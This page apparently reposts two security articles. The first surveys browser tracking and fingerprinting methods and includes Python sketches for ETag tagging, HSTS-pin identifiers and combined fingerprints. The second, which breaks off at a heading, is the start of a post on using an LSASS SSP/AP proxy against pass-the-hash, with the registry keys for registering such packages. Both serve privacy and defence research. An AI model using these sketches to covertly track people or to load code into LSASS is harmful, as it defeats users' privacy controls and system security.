We divided the methods discussed on this page into several categories: explicitly assigned client-side identifiers, such as HTTP cookies; inherent client device characteristics that identify a particular machine; and measurable user behaviors and preferences that may reveal the identity of the person behind the keyboard (or touchscreen). After reviewing the known tracking and fingerprinting techniques, we also discuss potential directions for future work and summarize some of the challenges that browser and other software vendors would face trying to detect or prevent such behaviors on the Web.

Contents

1 Explicitly assigned client-side identifiers
  1.1 HTTP cookies
  1.2 Flash LSOs
  1.3 Silverlight Isolated Storage
  1.4 HTML5 client-side storage mechanisms
  1.5 Cached objects
  1.6 Cache metadata: ETag and Last-Modified
  1.7 HTML5 AppCache
  1.8 Flash resource cache
  1.9 SDCH dictionaries
  1.10 Other script-accessible storage mechanisms
  1.11 Lower-level protocol identifiers
2 Machine-specific characteristics
  2.1 Browser-level fingerprints
  2.2 Network configuration fingerprints
3 User-dependent behaviors and preferences
4 Fingerprinting prevention and detection challenges
5 Potential directions for future work

Explicitly assigned client-side identifiers

The canonical approach to identifying clients across HTTP requests is to store a unique, long-lived token on the client and to programmatically retrieve it on subsequent visits.
Modern browsers offer a multitude of ways to achieve this goal, including but not limited to:

- Plain old HTTP cookies,
- Cookie-equivalent plugin features - most notably, Flash Local Shared Objects and Silverlight Isolated Storage,
- HTML5 client storage mechanisms, including localStorage, File, and IndexedDB APIs,
- Unique markers stored within locally cached resources or in cache metadata - e.g., Last-Modified and ETag,
- Fingerprints derived from browser-generated Origin-Bound Certificates for SSL connections,
- Bits encoded in HTTP Strict Transport Security pin lists across several attacker-controlled host names,
- Data encoded in SDCH compression dictionaries and dictionary metadata,
- ...and more.

We believe that the availability of any one of these mechanisms is sufficient to reliably tag clients and identify them later on; in addition to this, many such identifiers can be deployed in a manner that conceals the uniqueness of the ID assigned to a particular client. On the flip side, browsers provide users with some degree of control over the behavior of at least some of these APIs, and with several exceptions discussed later on, the identifiers assigned in this fashion do not propagate to other browser profiles or to private browsing sessions.

The remainder of this section provides a more in-depth overview of several notable examples of client tagging schemes that are within the reach of web apps.

HTTP cookies

HTTP cookies are the most familiar and best-understood method for persisting data on the client. In essence, any web server may issue unique identifiers to first-time visitors as a part of a HTTP response, and have the browser play back the stored values on all future requests to a particular site. All major browsers have for years been equipped with UIs for managing cookies; a large number of third-party cookie management and blocking software is available, too.
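The issue-and-play-back pattern can be sketched as server-side logic in a few lines of Python (the cookie name "uid" and the ten-year lifetime are arbitrary choices for illustration, not any standard):

```python
import http.cookies
import uuid

def issue_or_read_id(cookie_header=""):
    """Return (client_id, set_cookie_line_or_None) for an incoming request."""
    jar = http.cookies.SimpleCookie(cookie_header)
    if "uid" in jar:
        # Returning visitor: the browser played back the stored identifier.
        return jar["uid"].value, None
    # First-time visitor: mint a unique, long-lived identifier.
    uid = uuid.uuid4().hex
    cookie = http.cookies.SimpleCookie()
    cookie["uid"] = uid
    cookie["uid"]["max-age"] = str(10 * 365 * 24 * 3600)  # ~10 years
    return uid, cookie["uid"].OutputString()
```

On the first request the server emits the Set-Cookie line; on every later request the browser echoes "uid=..." back in the Cookie header, re-identifying the client.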
In practice, however, external research has implied that only a minority of users regularly review or purge browser cookies. The reasons for this are probably complex, but one of them may be that the removal of cookies tends to be disruptive: contemporary browsers do not provide any heuristics to distinguish between the session cookies that are needed to access the sites the user is logged into, and the rest.

Some browsers offer user-configurable restrictions on the ability for websites to set “third-party” cookies (that is, cookies coming from a domain other than the one currently displayed in the address bar - a behavior most commonly employed to serve online ads or other embedded content). It should be noted that the existing implementations of this setting will assign the “first-party” label to any cookies set by documents intentionally navigated to by the user, as well as to ones issued by content loaded by the browser as a part of full-page interstitials, HTTP redirects, or click-triggered pop-ups.

Compared to most other mechanisms discussed below, overt use of HTTP cookies is fairly transparent to the user. That said, the mechanism may be used to tag clients without the use of cookie values that obviously resemble unique IDs. For example, client identifiers could be encoded as a combination of several seemingly innocuous and reasonable cookie names, or could be stored in metadata such as paths, domains, or cookie expiration times. Because of this, we are not aware of any means for a browser to reliably flag HTTP cookies employed to identify a specific client in this manner.

Just as interestingly, the abundance of cookies means that an actor could even conceivably rely on the values set by others, rather than on any newly-issued identifiers that could be tracked directly to the party in question.
We have seen this employed for some rich content ads, which are usually hosted in a single origin shared by all advertisers - or, less safely, are executed directly in the context of the page that embeds the ad.

Flash LSOs

Local Shared Objects are the canonical way to store client-side data within Adobe Flash. The mechanism is designed to be a direct counterpart to HTTP cookies, offering a convenient way to maintain session identifiers and other application state on a per-origin basis. In contrast to cookies, LSOs can also be used for structured storage of data other than short snippets of text, making such objects more difficult to inspect and analyze in a streamlined way.

In the past, the behavior of LSOs within the Flash plugin had to be configured separately from any browser privacy settings, by visiting a lesser-known Flash Settings Manager UI hosted on macromedia.com (standalone installs of Flash 10.3 and above supplanted this with a Control Panel / System Preferences dialog available locally on the machine). Today, most browsers offer a degree of integration: for example, clearing cookies and other site data will generally also remove LSOs. On the flip side, more nuanced controls may not be synchronized: say, the specific setting for third-party cookies in the browser is not always reflected by the behavior of LSOs.

From a purely technical standpoint, the use of Local Shared Objects in a manner similar to HTTP cookies is within the apparent design parameters for this API - but the reliance on LSOs to recreate deleted cookies or bypass browser cookie preferences has been subject to public scrutiny.

Silverlight Isolated Storage

Microsoft Silverlight is a widely-deployed applet framework bearing many similarities to Adobe Flash. The Silverlight equivalent of Flash LSOs is known as Isolated Storage. The privacy settings in Silverlight are typically not coupled to the underlying browser.
In our testing, values stored in Isolated Storage survive clearing cache and site data in Chrome, Internet Explorer and Firefox. Perhaps more surprisingly, Isolated Storage also appears to be shared between all non-incognito browser windows and browser profiles installed on the same machine; this may have consequences for users who rely on separate browser instances to maintain distinct online identities.

As with LSOs, reliance on Isolated Storage to store session identifiers and similar state information does not present issues from a purely technical standpoint. That said, given that the mechanism is not currently managed via browser controls, its use for client identification is not commonplace and thus may be viewed as less transparent than standard cookies.

HTML5 client-side storage mechanisms

HTML5 introduces a range of structured data storage mechanisms on the client; this includes localStorage, the File API, and IndexedDB. Although semantically different from each other, all of them are designed to allow persistent storage of arbitrary blobs of binary data tied to a particular web origin. In contrast to cookies and LSOs, there are no significant size restrictions on the data stored with these APIs.

In modern browsers, HTML5 storage is usually purged alongside other site data, but the mapping to browser settings isn’t necessarily obvious. For example, Firefox will retain localStorage data unless the user selects “offline website data” or “site preferences” in the deletion dialog and specifies the time range as “everything” (this is not the default). Another idiosyncrasy is the behavior of Internet Explorer, where the data is retained for the lifetime of a tab for any sites that are open at the time the operation takes place. Beyond that, the mechanisms do not always appear to follow the restrictions on persistence that apply to HTTP cookies.
For example, in our testing, in Firefox, localStorage can be written and read in cross-domain frames even if third-party cookies are disabled. Due to the similarity of the design goals of these APIs, the authors expect that the perception and the caveats of using HTML5 storage for storing session identifiers would be similar to the situation with Flash and Silverlight.

Cached objects

For performance reasons, all mainstream web browsers maintain a global cache of previously retrieved HTTP resources. Although this mechanism is not explicitly designed as a random-access storage mechanism, it can be easily leveraged as such. To accomplish this, a cooperating server may return, say, a JavaScript document with a unique identifier embedded in its body, and set Expires / max-age= headers to a date in the distant future.

Once this unique identifier is stored within a script subresource in the browser cache, the ID can be read back on any page on the Internet simply by loading the script from a known URL and monitoring the agreed-upon local variable or setting up a predefined callback function in JavaScript. The browser will periodically check for newer copies of the script by issuing a conditional request to the originating server with a suitable If-Modified-Since header; but if the server consistently responds to such checks with HTTP code 304 (“Not Modified”), the old copy will continue to be reused indefinitely.

There is no concept of blocking “third-party” cache objects in any browser known to the authors of this document, and no simple way to prevent cache objects from being stored without dramatically degrading the performance of everyday browsing. Automated detection of such behaviors is extremely difficult owing to the sheer volume and complexity of cached JavaScript documents encountered on the modern Web. All browsers expose the option to manually clear the document cache.
That said, because clearing the cache requires specific action on the part of the user, it is unlikely to be done regularly, if at all. Leveraging the browser cache to store session identifiers is very distinct from using HTTP cookies; the authors are unsure if and how the cookie settings - the convenient abstraction layer used for most of the other mechanisms discussed to date - could map to the semantics of browser caches.

Cache metadata: ETag and Last-Modified

To make implicit browser-level document caching work properly, servers must have a way to notify browsers that a newer version of a particular document is available for retrieval. The HTTP/1.1 standard specifies two methods of document versioning: one based on the date of the most recent modification, and another based on an abstract, opaque identifier known as ETag.

In the ETag scheme, the server initially returns an opaque “version tag” string in a response header alongside the actual document. On subsequent conditional requests to the same URL, the client echoes back the value associated with the copy it already has, through an If-None-Match header; if the version specified in this header is still current, the server will respond with HTTP code 304 (“Not Modified”) and the client is free to reuse the cached document. Otherwise, a new document with a new ETag will follow.

Interestingly, the behavior of the ETag header closely mimics that of HTTP cookies: the server can store an arbitrary, persistent value on the client, only to read it back later on. This observation, and its potential applications for browser tracking, dates back at least to 2000. The other versioning scheme, Last-Modified, suffers from the same issue: servers can store at least 32 bits of data within a well-formed date string, which will then be echoed back by the client through a request header known as If-Modified-Since. (In practice, most browsers don't even require the string to be a well-formed date to begin with.)
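The ETag tagging trick can be sketched as server-side logic (a hypothetical handler written for illustration, not code from any real tracker):

```python
import uuid

issued_tags = set()  # server-side record of identifiers handed out as ETags

def handle_conditional_request(if_none_match=None):
    """Return (status, etag) for a request to the tracked resource."""
    if if_none_match in issued_tags:
        # Known client: confirm its cached copy with 304 so the tag keeps
        # living in the browser cache; the sighting can be logged here.
        return 304, if_none_match
    # New client: mint an opaque "version tag" that is really a client ID.
    tag = uuid.uuid4().hex
    issued_tags.add(tag)
    return 200, tag
```

The first visit returns 200 with a fresh ETag; every revalidation echoes it back via If-None-Match, and the 304 answer keeps the identifier cached indefinitely.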
Similarly to tagging users through cache objects, both of these “metadata” mechanisms are unaffected by the deletion of cookies and related site data; the tags can be destroyed only by purging the browser cache. As with Flash LSOs, the use of ETag to allegedly skirt browser cookie settings has been subject to scrutiny.

HTML5 AppCache

Application Caches allow website authors to specify that portions of their websites should be stored on the disk and made available even if the user is offline. The mechanism is controlled by cache manifests that outline the rules for storing and retrieving cache items within the app. Similarly to implicit browser caching, AppCaches make it possible to store unique, user-dependent data - be it inside the cache manifest itself, or inside the resources it requests. The resources are retained indefinitely and are not subject to the browser’s usual cache eviction policies.

AppCache appears to occupy a netherworld between HTML5 storage mechanisms and the implicit browser cache. In some browsers, it is purged along with cookies and stored website data; in others, it is discarded only if the user opts to delete the browsing history and all cached documents.

Note: AppCache is likely to be succeeded by Service Workers; the privacy properties of both mechanisms are likely to be comparable.

Flash resource cache

Flash maintains its own internal store of resource files, which can be probed using a variety of techniques. In particular, the internal repository includes an asset cache, relied upon to store Runtime Shared Libraries signed by Adobe to improve applet load times. There is also Adobe Flash Access, a mechanism to store automatically acquired licenses for DRM-protected content. As of this writing, these document caches do not appear to be coupled to any browser privacy settings and can only be deleted by making several independent configuration changes in the Flash Settings Manager UI on macromedia.com.
We believe there is no global option to delete all cached resources or prevent them from being stored in the future. Browsers other than Chrome appear to share Flash asset data across all installations and in private browsing modes, which may have consequences for users who rely on separate browser instances to maintain distinct online identities.

SDCH dictionaries

SDCH is a Google-developed compression algorithm that relies on the use of server-supplied, cacheable dictionaries to achieve compression rates considerably higher than what’s possible with methods such as gzip or deflate for several common classes of documents.

The site-specific dictionary caching behavior at the core of SDCH inevitably offers an opportunity for storing unique identifiers on the client: both the dictionary IDs (echoed back by the client using the Avail-Dictionary header), and the contents of the dictionaries themselves, can be used for this purpose, in a manner very similar to the regular browser cache. In Chrome, the data does not persist across browser restarts; it was, however, shared between profiles and incognito modes, and was not deleted with other site data when such an operation was requested by the user. Google addressed this in bug 327783.

Other script-accessible storage mechanisms

Several other more limited techniques make it possible for JavaScript or other active content running in the browser to maintain and query client state, sometimes in a fashion that can survive attempts to delete all browsing and site data. For example, it is possible to use window.name or sessionStorage to store persistent identifiers for a given window: if a user deletes all client state but does not close a tab that at some point in the past displayed a site determined to track the browser, re-navigation to any participating domain will allow the window-bound token to be retrieved and the new session to be associated with the previously collected data.
More obviously, the same is true for active JavaScript: any currently open JavaScript context is allowed to retain state even if the user attempts to delete local site data; this can be done not only by the top-level sites open in the currently-viewed tabs, but also by “hidden” contexts such as HTML frames, web workers, and pop-unders. This can happen by accident: for example, a running ad loaded in an <iframe> may remain completely oblivious to the fact that the user attempted to clear all browsing history, and keep using a session ID stored in a local variable in JavaScript. (In fact, in addition to JavaScript, Internet Explorer will also retain session cookies for the currently-displayed origins.)

Another interesting and often-overlooked persistence mechanism is the caching of RFC 2617 HTTP authentication credentials: once explicitly passed in a URL, the cached values may be sent on subsequent requests even after all the site data is deleted in the browser UI.

In addition to the cross-browser approaches discussed earlier in this document, there are also several proprietary APIs that can be leveraged to store unique identifiers on the client system. An interesting example of this are the proprietary persistence behaviors in some versions of Internet Explorer, including the userData API. Last but not least, a variety of other, less common plugins and plugin-mediated interfaces likely expose analogous methods for storing data on the client, but have not been studied in detail as a part of this write-up; an example of this may be the PersistenceService API in Java, or the DRM license management mechanisms within Silverlight.
Lower-level protocol identifiers

On top of the fingerprinting mechanisms associated with HTTP caching and with the purpose-built APIs available to JavaScript programs and plugin-executed code, modern browsers provide several network-level features that offer an opportunity to store or retrieve unique identifiers:

- Origin Bound Certificates (aka ChannelID) are persistent self-signed certificates identifying the client to an HTTPS server, envisioned as the future of session management on the web. A separate certificate is generated for every newly encountered domain and reused for all connections initiated later on. By design, OBCs function as unique and stable client fingerprints, essentially replicating the operation of authentication cookies; they are treated as “site and plug-in data” in Chrome, and can be removed along with cookies. Uncharacteristically, sites can leverage OBCs for user tracking without performing any actions that would be visible to the client: the ID can be derived simply by taking note of the cryptographic hash of the certificate automatically supplied by the client as a part of a legitimate SSL handshake. ChannelID is currently suppressed in Chrome in “third-party” scenarios (e.g., for different-domain frames).

- The set of supported ciphersuites can be used to fingerprint a TLS/SSL handshake. Note that clients have been actively deprecating various ciphersuites in recent years, making this attack even more powerful.

- In a similar fashion, two separate mechanisms within TLS - session identifiers and session tickets - allow clients to resume previously terminated HTTPS connections without completing a full handshake; this is accomplished by reusing previously cached data. These session resumption protocols provide a way for servers to identify subsequent requests originating from the same client for a short period of time.
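The ciphersuite-ordering signal can be reduced to a compact identifier on the server side; a passive-observer sketch (the hashing scheme here is our own illustration - real-world fingerprinters combine additional ClientHello fields):

```python
import hashlib

def client_hello_fingerprint(ciphersuites, extensions=()):
    """Hash the ordered ciphersuite and extension IDs offered by a client.

    Order matters: two TLS stacks offering the same suites in a different
    order produce different fingerprints.
    """
    blob = ",".join(map(str, ciphersuites)) + ";" + ",".join(map(str, extensions))
    return hashlib.sha256(blob.encode()).hexdigest()[:16]
```

Because the offered list and its order are fixed by the client's TLS implementation, the resulting value stays stable across visits without the server storing anything on the client.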
- HTTP Strict Transport Security is a security mechanism that allows servers to demand that all future connections to a particular host name happen exclusively over HTTPS, even if the original URL nominally begins with “http://”. It follows that a fingerprinting server could set long-lived HSTS headers for a distinctive set of attacker-controlled host names for each newly encountered browser; this information could then be retrieved by loading faux (but possibly legitimate-looking) subresources from all the designated host names and seeing which of the connections are automatically switched to HTTPS. In an attempt to balance security and privacy, any HSTS pins set during normal browsing are carried over to the incognito mode in Chrome; there is no propagation in the opposite direction, however. It is worth noting that leveraging HSTS for tracking purposes would require establishing log(n) connections to uniquely identify n users, which makes it relatively unattractive, except for targeted uses; that said, creating a smaller number of buckets may be a valuable tool for refining other imprecise fingerprinting signals across a very large user base.

- Last but not least, virtually all modern browsers maintain internal DNS caches to speed up name resolution (and, in some implementations, to mitigate the risk of DNS rebinding attacks). Such caches can be easily leveraged to store small amounts of information for a configurable amount of time; for example, with 16 available IP addresses to choose from, around 8-9 cached host names would be sufficient to uniquely identify every computer on the Internet. On the flip side, the value of this approach is limited by the modest size of browser DNS caches and the potential conflicts with resolver caching on the ISP level.
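The log(n) arithmetic behind HSTS tracking can be made concrete: each tracked host name carries one bit of the client ID, so 20 host names suffice for about a million distinct clients. A sketch (the host names are made up for illustration):

```python
# One bit of the client ID per host: the bit is 1 if the server set a
# long-lived HSTS pin on that host when the ID was issued.
HOSTS = ["t%d.tracker.example" % i for i in range(20)]  # 2**20 possible IDs

def hosts_to_pin(client_id):
    """Hosts on which to set HSTS so the browser 'remembers' client_id."""
    return [h for i, h in enumerate(HOSTS) if (client_id >> i) & 1]

def recover_id(upgraded_hosts):
    """Reconstruct the ID from the hosts the browser auto-upgrades to HTTPS."""
    return sum(1 << HOSTS.index(h) for h in upgraded_hosts)
```

On a later visit, the server loads an http:// subresource from every host in HOSTS; the subset of requests that arrive over HTTPS reveals the bit pattern, and recover_id() turns it back into the identifier.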
Machine-specific characteristics

With the notable exception of Origin-Bound Certificates, the techniques described in section 1 of the document rely on a third-party website explicitly placing a new unique identifier on the client system. Another, less obvious approach to web tracking relies on querying or indirectly measuring the inherent characteristics of the client system. Individually, each such signal will reveal just several bits of information - but when combined together, it seems probable that they may uniquely identify almost any computer on the Internet. In addition to being harder to detect or stop, such techniques could be used to cross-correlate user activity across various browser profiles or private browsing sessions. Furthermore, because the techniques are conceptually very distant from HTTP cookies, the authors find it difficult to decide how, if at all, the existing cookie-centric privacy controls in the browser should be used to govern such practices.

EFF Panopticlick is one of the most prominent experiments demonstrating the principle of combining low-value signals into a high-accuracy fingerprint; there is also some evidence of sophisticated passive fingerprints being used by commercial tracking services.

Browser-level fingerprints

The most straightforward approach to fingerprinting is to construct identifiers by actively and explicitly combining a range of individually non-identifying signals available within the browser environment:

- User-Agent string, identifying the browser version, OS version, and some of the installed browser add-ons. (In cases where User-Agent information is not available or imprecise, browser versions can usually be inferred very accurately by examining the structure of other headers and by testing for the availability and semantics of the features introduced or modified between releases of a particular browser.)
- Clock skew and drift: unless synchronized with an external time source, most systems exhibit clock drift that, over time, produces a fairly unique time offset for every machine. Such offsets can be measured with microsecond precision using JavaScript. In fact, even in the case of NTP-synchronized clocks, ppm-level skews may be possible to measure remotely.

- Fairly fine-grained information about the underlying CPU and GPU, either as exposed directly (GL_RENDERER) or as measured by executing Javascript benchmarks and testing for driver- or GPU-specific differences in WebGL rendering or the application of ICC color profiles to <canvas> data.

- Screen and browser window resolutions, including parameters of secondary displays for multi-monitor users.

- The window-manager- and addon-specific “thickness” of the browser UI in various settings (e.g., window.outerHeight - window.innerHeight).

- The list and ordering of installed system fonts - enumerated directly or inferred with the help of an API such as getComputedStyle.

- The list of all installed plugins, ActiveX controls, and Browser Helper Objects, including their versions - queried or brute-forced through navigator.plugins[]. (Some add-ons also announce their existence in HTTP headers.)

- Information about installed browser extensions and other software. While the set cannot be directly enumerated, many extensions include web-accessible resources that aid in fingerprinting. In addition to this, add-ons such as popular ad blockers make detectable modifications to viewed pages, revealing information about the extension or its configuration. Using browser “sync” features may result in these characteristics being identical for a given user across multiple devices. A similar but less portable approach specific to Internet Explorer allows websites to enumerate locally installed software by attempting to load DLL resources via the res:// pseudo-protocol.

- Random seeds reconstructed from the output of non-cryptosafe PRNGs (e.g.
Math.random(), multipart form boundaries, etc.). In some browsers, the PRNG is initialized only at startup, or reinitialized using values that are system-specific (e.g., based on system time or PID).

According to the EFF, their Panopticlick experiment - which combines only a relatively small subset of the actively-probed signals discussed above - is able to uniquely identify 95% of desktop users based on system-level metrics alone. Current commercial fingerprinters are reported to be considerably more sophisticated, and their developers might be able to claim significantly higher success rates.

Of course, the value of some of the signals discussed here will be diminished on mobile devices, where both the hardware and the software configuration tends to be more homogenous; for example, measuring window dimensions or the list of installed plugins offers very little data on most Android devices. Nevertheless, we feel that the remaining signals - such as clock skew and drift and the network-level and user-specific signals described later on - are together likely more than sufficient to uniquely identify virtually all users.

When discussing potential mitigations, it is worth noting that restrictions such as disallowing the enumeration of navigator.plugins[] generally do not prevent fingerprinting; the set of all notable plugins and fonts ever created and distributed to users is relatively small, and a malicious script can conceivably test for every possible value in very little time.

Network configuration fingerprints

An interesting set of additional device characteristics is associated with the architecture of the local network and the configuration of lower-level network protocols; such signals are disclosed independently of the design of the web browser itself. The traits covered here are generally shared between all browsers on a given client and cannot be easily altered by common privacy-enhancing tools or practices; they include:

- The external client IP address.
For IPv6 addresses, this vector is even more interesting: in some settings, the last octets may be derived from the device's MAC address and preserved across networks.

- A broad range of TCP/IP and TLS stack fingerprints, obtained with passive tools such as p0f. The information disclosed on this level is often surprisingly specific: for example, TCP/IP traffic will often reveal high-resolution system uptime data through TCP timestamps.

- Ephemeral source port numbers for outgoing TCP/IP connections, generally selected sequentially by most operating systems.

- The local network IP address for users behind network address translation or HTTP proxies (via WebRTC). Combined with the external client IP, the internal NAT IP uniquely identifies most users, and is generally stable for desktop browsers (due to the tendency for DHCP clients and servers to cache leases).

- Information about proxies used by the client, as detected from the presence of extra HTTP headers (Via, X-Forwarded-For). This can be combined with the client’s actual IP address revealed when making proxy-bypassing connections using one of several available methods.

- With active probing, the list of open ports on the local host, indicating other installed software and firewall settings on the system. Unruly actors may also be tempted to probe the systems and services in the visitor’s local network; doing so directly within the browser will circumvent any firewalls that normally filter out unwanted incoming traffic.

User-dependent behaviors and preferences

In addition to trying to uniquely identify the device used to browse the web, some parties may opt to examine characteristics that aren’t necessarily tied to the machine, but that are closely associated with specific users, their local preferences, and the online behaviors they exhibit. Similarly to the methods described in section 2, such patterns would persist across different browser sessions, profiles, and across the boundaries of private browsing modes.
The following data is typically open to examination:

- Preferred language, default character encoding, and local time zone (sent in HTTP headers and visible to JavaScript).

- Data in the client cache and history. It is possible to detect items in the client’s cache by performing simple timing attacks; for any long-lived cache items associated with popular destinations on the Internet, a fingerprinter could detect their presence simply by measuring how quickly they load (and by aborting the navigation if the latency is greater than expected for the local cache). (It is also possible to directly extract URLs stored in the browsing history, although such an attack requires some user interaction in modern browsers.)

- Mouse gesture, keystroke timing and velocity patterns, and accelerometer readings (ondeviceorientation) that are unique to a particular user or to particular surroundings. There is a considerable body of scientific research suggesting that even relatively trivial interactions are deeply user-specific and highly identifying.

- Any changes to default website fonts and font sizes, website zoom level, and the use of any accessibility features such as text color, size, or CSS overrides (all indirectly measurable with JavaScript).

- The state of client features that can be customized or disabled by the user, with special emphasis on mechanisms such as DNT, third-party cookie blocking, changes to DNS prefetching, pop-up blocking, Flash security and content storage, and so on. (In fact, users who extensively tweak their settings from the defaults may actually be making their browsers considerably easier to uniquely fingerprint.)
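Signals like these, together with the machine-level characteristics from section 2, are typically folded into a single identifier. A Panopticlick-style sketch (the signal names are illustrative; real fingerprinters use many more traits):

```python
import hashlib
import math

def combined_fingerprint(signals):
    """Collapse a dict of individually weak signals into one stable ID."""
    # Sort the keys so the hash does not depend on collection order.
    blob = "|".join("%s=%s" % (k, v) for k, v in sorted(signals.items()))
    return hashlib.sha256(blob.encode()).hexdigest()

def surprisal_bits(fraction_of_users):
    """A trait shared by a fraction p of users contributes -log2(p) bits."""
    return -math.log2(fraction_of_users)
```

For intuition: a time zone shared by 1 in 20 users contributes about 4.3 bits, and roughly 33 bits are enough to single out one person among the world's population, which is why combining even a handful of such traits is so effective.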
On top of this, user fingerprinting can be accomplished by interacting with third-party services through the user’s browser, using the ambient credentials (HTTP cookies) maintained by the browser:

- Users logged into websites that offer collaboration features can be de-anonymized by covertly instructing their browser to navigate to a set of distinctively ACLed resources and then examining which of these navigation attempts result in a new collaborator showing up in the UI.

- Request timing, onerror and onload handlers, and similar measurement techniques can be used to detect which third-party resources return HTTP 403 error codes in the user’s browser, thus constructing an accurate picture of which sites the user is logged into; in some cases, finer-grained insights into user settings or preferences on the site can be obtained, too. (A similar but possibly more versatile login-state attack can also be mounted with the help of Content Security Policy, a new security mechanism introduced in modern browsers.)

- Any of the explicit web application APIs that allow identity attestation may be leveraged to confirm the identity of the current user (typically based on a starting set of probable guesses).

Fingerprinting prevention and detection challenges

In a world with no possibility of fingerprinting, web browsers would be indistinguishable from each other, with the exception of a small number of robustly compartmentalized and easily managed identifiers used to maintain login state and implement other essential features in response to the user’s intent. In practice, the Web is very different: browser tracking and fingerprinting are attainable in a large number of ways. A number of the unintentional tracking vectors are a product of implementation mistakes or oversights that could conceivably be corrected today; many others are virtually impossible to fully rectify without completely changing the way that browsers, web applications, and computer networks are designed and operated.
In fact, some of these design decisions might have played an unlikely role in the success of the Web. In lieu of eliminating the possibility of web tracking, some have raised hopes of detecting the use of fingerprinting in the online ecosystem and bringing it to public attention via technical means, through browser- or server-side instrumentation. Nevertheless, even this simple concept runs into a number of obstacles:

- Some fingerprinting techniques simply leave no remotely measurable footprint, thus precluding any attempts to detect them in an automated fashion.
- Most other fingerprinting and tagging vectors are used in fairly evident ways today, but could easily be redesigned so that they are practically indistinguishable from unrelated types of behavior. This would frustrate any programmatic detection strategies in the long haul, particularly if they are attempted on the client (where the party seeking to avoid detection can reverse-engineer the checks and iterate until the behavior is no longer flagged as suspicious).
- The distinction between behaviors that may be acceptable to the user and ones that might not be is hidden from view: for example, a cookie set for abuse detection looks the same as a cookie set to track online browsing habits. Without a way to distinguish between the two and properly classify the observed behaviors, tracking detection mechanisms may provide little real value to the user.

Potential directions for future work

There may be no simple, universal, technical solutions to the problem of tracking on the Web by parties who are intent on doing so with no regard for user controls.
That said, the authors of this page see some theoretical room for improvement when it comes to building simpler and more intuitive privacy controls to provide a better framework for the bulk of interactions with responsible sites and parties on the Internet:

- The current browser privacy controls evolved almost exclusively around the notion of HTTP cookies and several other very specific concepts that do not necessarily map cleanly to many of the tracking and fingerprinting methods discussed in this document. In light of this, to better meet user expectations, it may be beneficial for in-browser privacy settings to focus on clearly explaining practical privacy outcomes, rather than continuing to build on top of narrowly defined concepts such as "third-party cookies".
- We worry that in some cases, interacting with browser privacy controls can degrade one’s browsing experience, discouraging the user from ever touching them. A canonical example of this is trying to delete cookies: reviewing them manually is generally impractical, while deleting all cookies will kick the user out of any sites he or she is logged into and frequents every day. Although fraught with some implementation challenges, it may be desirable to build better heuristics that distinguish and preserve site data specifically for the destinations that users frequently log into or meaningfully interact with.
- Even for extremely privacy-conscious users who are willing to put up with the inconvenience of deleting their cookies and purging other session data, resetting online fingerprints can be difficult and fail in unexpected ways. An example of this is discussed in section 1: if there are ads loaded on any of the currently open tabs, clearing all local data may not actually result in a clean slate. Investing in technologies that provide more robust and intuitive ways to maintain, manage, or compartmentalize one's online footprints may be a noble goal.
Today, some privacy-conscious users may resort to tweaking multiple settings and installing a broad range of extensions that together have the paradoxical effect of facilitating fingerprinting - simply by making their browsers considerably more distinctive, no matter where they go. There is a compelling case for improving the clarity and effect of a handful of well-defined privacy settings so as to limit the probability of such outcomes. We present these ideas for discussion within the community; at the same time, we recognize that although they may sound simple when expressed in a single paragraph, their technical underpinnings are elusive and may prove difficult or impossible to fully flesh out and implement in any browser.

Sursa: http://www.chromium.org/Home/chromium-security/client-identification-mechanisms
-
Using an SSP/AP LSASS Proxy to Mitigate Pass-the-Hash Pre-Windows 8.1

mit·i·gate (verb): make less severe, serious, or painful. "he wanted to mitigate misery in the world"
Synonyms: alleviate, reduce, diminish, lessen, weaken, lighten, attenuate, take the edge off, allay, ease, assuage, palliate, relieve, tone down

Intro

A colleague (Matt Weeks/scriptjunkie) guest posted an article on the passing-the-hash blog (@passingthehash) about March being Pass-the-Hash awareness month, updating us on where we are today regarding this family of issues. I thought this would be a good subject for an opening post. This post mostly concerns pre-Windows 8.1 systems that use smart cards and Kerberos as their primary form of authentication, though it may apply to other configurations as well. It covers the very basics of what I did to create a custom Security Support Provider/Authentication Package (SSP/AP) as a proxy in order to help mitigate the problem of LSASS storing NTLM credentials in its memory space. This technique should probably only be used when your primary mode of authentication is something other than NTLM, such as Kerberos, as it will prevent LSASS from properly caching NTLM credentials on the client for later use. While this does not solve the problem and is by no means a perfect solution (that probably has to come from Microsoft), it will at least offer some protection against some of the low-hanging-fruit attacks.

Kerberos and NTLM Hashes

Many believe that the solution to Pass-the-Hash is to simply require Kerberos on their network for authentication, thus moving the problem to Pass-the-Ticket. What they don't realize is that the system also generates an NTLM hash that is stored in LSASS memory, even when it is not used.
Without going into too much detail, as it's documented elsewhere (see references below), the gist is that the key distribution center provides a hash of the user's credentials to be stored by the client's LSASS in case Kerberos later becomes unavailable, in which case the client will fall back to using the hash for single-sign-on logins/authentication. Because of this, even on a domain that requires Kerberos to log in and access network resources, a backup hash is readily available for stealing. The end effect is that, from an attacker's perspective, not much has changed. Any local logins will have their user credential hash stored in LSASS memory for at least some time, as will any remote desktop logins to that system (such as by domain admins/privileged users). All the attacker needs to do is grab those hashes from LSASS memory and continue. This was the problem that we were trying to mitigate on the client machines. We'll come back to this...

SSP/AP and SSP Proxies

What are SSP/APs and SSPs? SSP/APs and SSPs are described on Microsoft's SSP/APs vs SSPs page, but basically they are packages (DLLs) that are loaded by LSASS at startup and can be used for various security mechanisms such as authentication, message integrity, and encryption. Microsoft provides a couple with Windows, including msv1_0.dll (local interactive logins and NTLM authentication, among others) and kerberos.dll (Kerberos). Microsoft also allows custom SSP/APs and SSPs to be registered and loaded by LSASS as follows:

- To register an SSP/AP, add the name of the package to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Authentication Packages.
- To register an SSP, add the name of the package to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages.

For each package registered, a DLL with that package name (ex: mypackage = mypackage.dll) must exist in the Windows\System32 directory.
Once the system restarts, LSASS will load the packages found in those two registry keys and use them as described in the SSP/AP and SSP documentation.

What is an SSP/AP or SSP Proxy?

While researching the LSASS authentication flow and components, I came across a blog post by Koby Kahane (Implementing an LSA proxy authentication package) describing how he implemented an LSA proxy authentication package. He did quite a bit of research into proxying msv1_0 in order to test the feasibility of adding additional authentication steps prior to passing control to the original package. When I saw this, one of the first things to come to mind was how I could use this technique to stop LSASS from caching credentials that I did not want used on the domain.

Authentication Flow

